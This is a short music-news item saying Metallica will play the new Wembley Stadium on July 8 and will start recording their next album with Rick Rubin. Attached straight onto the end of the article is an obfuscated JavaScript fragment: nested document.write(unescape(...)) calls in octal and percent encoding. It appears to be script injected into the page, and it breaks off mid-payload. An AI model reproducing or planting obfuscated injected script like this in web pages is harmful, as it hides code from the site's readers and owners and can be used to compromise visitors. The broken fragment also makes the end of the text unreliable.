Metallica will play Wembley Stadium this summer, according to reports.
The rock legends are expected to become one of the first groups to host a show at the rebuilt London landmark when it finally opens its doors.
The band, who are scheduled to begin recording their new album later this month, will confirm details of the July 8 concert shortly, claims the NME.
The gig will follow a two-night stint by Muse, on June 16 and 17, and George Michael's concert on June 9, which is expected to be the first at the new Wembley.
Meanwhile, a posting on Metallica's official website confirms plans to reconvene for the follow-up to 2003's "St Anger" on March 12, with Rick Rubin again producing.
Speaking to Billboard at the end of last year about the LP, Rubin commented: "We really have to feel secure about the music and know it's good.
"Then in the studio, we're free to only worry about performance and not worry about writing a song. Hopefully, we've done our homework."document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
